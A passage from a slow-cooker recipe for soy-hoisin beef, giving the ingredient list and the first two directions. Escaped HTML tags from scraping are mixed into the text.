Ingredients:<\/strong><\/p>\n
\n- 1 onion, thickly sliced<\/li>\n
- 2 tsp. olive oil<\/li>\n
- 1 1\/2 lb. stew meat<\/li>\n
- 1 TBSP minced garlic (jarred)<\/li>\n
- 1 TBSP fresh ginger (paste)<\/li>\n
- 1\/2 c. soy sauce<\/li>\n
- 1\/2 c. water<\/li>\n
- 1\/2 c. Hoisin sauce<\/li>\n
- 1\/2 c. (1\/4 c. Splenda) brown sugar<\/li>\n
- 3 TBSP cornstarch<\/li>\n<\/ul>\n
Directions:<\/strong><\/p>\n
\n- Mix garlic through cornstarch in a bowl.<\/li>\n
- Add onions to the bottom of the Crockpot; then add the olive oil; then add the meat; and then pour the sauce over the meat.<\/li>\n
